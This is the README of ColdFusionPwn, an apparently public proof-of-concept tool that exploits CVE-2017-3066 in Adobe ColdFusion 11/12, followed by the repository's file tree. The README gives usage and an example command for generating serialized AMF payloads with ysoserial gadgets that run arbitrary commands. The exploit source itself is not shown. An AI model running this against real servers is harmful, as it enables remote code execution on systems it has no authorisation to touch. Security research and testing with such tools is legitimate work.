Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12# ColdFusionPwn
Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12.
## Description
The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes.
For details see our [blog post](https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html).
## Install
Get the latest version of [ysoserial](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar).
Get ColdFusionPwn from [releases](https://github.com/codewhitesec/ColdFusionPwn/releases).
## Usage
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
```
```
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
```
It's required to have ColdFusionPwn-0.0.1-SNAPSHOT-all.jar as first entry in the classpath, since the ApacheCommons BeanUtils library shipped with ysoserial is newer (and has a different serialversion uid).
## Examples
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
```
[4.0K] /data/pocs/c0ee6e2a7c9c37f330691ac33eb3040923adf9ef
├── [ 740] DISCLAIMER.md
├── [1.0K] LICENSE
├── [2.9K] pom.xml
├── [1.3K] README.md
└── [4.0K] src
├── [4.0K] assembly
│ └── [1.3K] bin.xml
└── [4.0K] main
└── [4.0K] java
├── [4.0K] com
│ └── [4.0K] codewhitesec
│ └── [4.0K] coldfusionpwn
│ └── [2.3K] ColdFusionPwner.java
└── [4.0K] org
├── [4.0K] apache
│ └── [4.0K] axis2
│ └── [4.0K] util
│ └── [1.0K] MetaDataEntry.java
└── [4.0K] jgroups
└── [4.0K] blocks
└── [ 683] ReplicatedTree.java
13 directories, 8 files